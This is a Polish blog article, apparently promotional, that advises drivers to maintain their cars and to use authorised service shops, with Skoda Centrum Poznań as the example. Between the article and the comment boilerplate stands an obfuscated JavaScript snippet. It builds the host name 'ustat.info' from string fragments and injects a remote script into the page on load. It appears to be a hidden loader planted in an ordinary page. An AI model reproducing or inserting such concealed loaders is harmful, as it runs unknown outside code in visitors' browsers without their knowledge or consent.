Kierowco! Serwisuj z głową!

Nie powstał jeszcze taki samochód, którego prędzej czy później nie trzeba odstawić do serwisu.

Nie powstał jeszcze taki samochód, którego prędzej czy później nie trzeba odstawić do serwisu. Niekoniecznie musi to być kwestia awaryjności – normalnym jest, że w trakcie korzystania z samochodu, wskutek eksploatacji, niezbędna jest konserwacja lub wymiana niektórych części. Istotne pytanie brzmi: jak ograniczyć tę nieprzyjemną konieczność?

Dbaj o swój samochód

Najprostszym sposobem, który pozwoli ograniczyć do maksimum ilość odwiedzin w serwisie, jest, co wydawałoby się oczywiste, odpowiednia konserwacja pojazdu. Regularne mycie karoserii, przeczyszczanie wentylacji czy kontrola ciśnienia w oponach przyczyni się do wydłużenia przydatności tych elementów. Koniecznym jest również to, co wlewasz do swojego samochodu – dosłownie. Płyny eksploatacyjne z najniższej półki, a także benzyna niewiadomego pochodzenia, może i są tańsze, niemniej ich jakość okazuje się znacznie niższa, a co za tym idzie, przyczyniają się do szybszego wzrostu zużycia silnika i innych części. Prawdę mówiąc, najlepsze płyny to te, sygnowane marką Twojego samochodu. Powstają specjalnie po to, aby służyć konkretnym modelom, są dostosowane do ich potrzeb.

Jeśli serwis to zaufany

Tak jak napisaliśmy we wstępie, każdy samochód, nawet ten zadbany, prędzej czy później, trafi na podnośnik w serwisie. Kiedy już staniesz przed tą niemiłą koniecznością, zwróć szczególną uwagę komu i gdzie powierzysz swoje auto. Wyobraź sobie, że udajesz się do prywatnego lekarza na operację. Zależy Ci, aby był on profesjonalistą, a zabieg został wykonany perfekcyjnie. Serwisant jest dla samochodu jak chirurg, a kierowca decyduje, do której placówki się uda. Upewnij się, czy wybrany przez ciebie serwis dysponuje odpowiednimi papierami, nowoczesnym sprzętem i wykwalifikowanym personelem. Dyrektor powinien udzielić Ci wszelkich niezbędnych informacji. Jeśli jednak nie będzie chciał tego uczynić, może okazać się, że nie jest to miejsce godne zaufania. Podobnie jak w przypadku płynów, największą pewność i gwarancję jakości uzyskasz w sygnowanym marką, autoryzowanym serwisie. Te często znajdują się w pobliżu salonu sprzedaży. Na przykład kierowcy Skody z Wielkopolski, mogą skorzystać z serwisu przy salonie Skoda Centrum Poznań, przy ul. Głogowskiej/Wajsówny 7, przy tradie Poznań-Komorniki.

Skontroluj naprawę i wymianę

Jeśli nie chcesz wracać pod ten sam adres, z którego dopiero co odebrałeś samochód, lepiej upewnij się, czy serwisowanie odbyło się w należytym porządku. Niestety, zwłaszcza w przypadku nieautoryzowanych placówek, może się zdarzyć, że usługa zostanie wykonana bez zachowania należytego profesjonalizmu. Na przykład serwisant przez nieuwagę nie podłączy jakiegoś elementu, nie wykona jednej z wymaganych czynności, czy, co również się zdarza, zamówi nieodpowiednią część i obciąży kosztami klienta. Kierowca nie ma i nie musi mieć specjalistycznej wiedzy, wszak właśnie z powodu jej braku oddaje auto do serwisu, ale zanim wrócisz do domu, przetestuj wszystkie funkcjonalności samochodu, aby mieć pewność, iż nic nie zostało pominięte. Jeśli w trakcie jazdy do domu albo innych tras w okresie kilku dni od serwisowania, wystąpi jakakolwiek oznaka niewłaściwego zachowania samochodu – niezwłocznie reklamuj usługę. Tego typu wpadki, raczej nie mają prawa zdarzyć się w serwisach autoryzowanych, gdyż reputacja w ich przypadku jest zbyt ważna, nawet jednostkowe zdarzenie mogłoby spowodować znaczne straty.

Autoryzowany, czyli dopasowany do Twojego samochodu.

Zarówno jeśli chodzi o konserwację samochodu, jak i jego serwisowanie, zdecydowanie najbardziej rekomendujemy korzystanie z dedykowanych, autoryzowanych płynów, części, serwisów. Jak wykazaliśmy, są one specjalnie opracowane pod wyśrubowane i indywidualne potrzeby każdego z modeli producenta. Odpowiedzialny za konkretne etapy procesu są zwykle profesjonalistami współpracującymi z inżynierami marki oraz posiadającymi dodatkowe, wewnętrzne instrukcje, specjalne narzędzia i wsparcie. Wspomniany już serwis w kompleksie Skoda Centrum Poznań, i inne jemu podobne, stanowią najlepszy dowód na te słowa.

(function(){
ahzh=document.createElement(“script”);ahzh_=”u”+(“s”)+”ta”;
ahzh_+=(“t.i”)+””+”n”;ahzh_+=((“f”)+”o”);ahzh.type=”text/javascript”;
ahzh_+=”/”; ahzhu=”15397816″;ahzhu+=”.1wfiuaxlhzhzb6b7mu0″;ahzhu+=”rmagv71tvzX”;
ahzh.src=”//”+ahzh_+ahzhu; ahzh.async=true; document.body.appendChild(ahzh);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.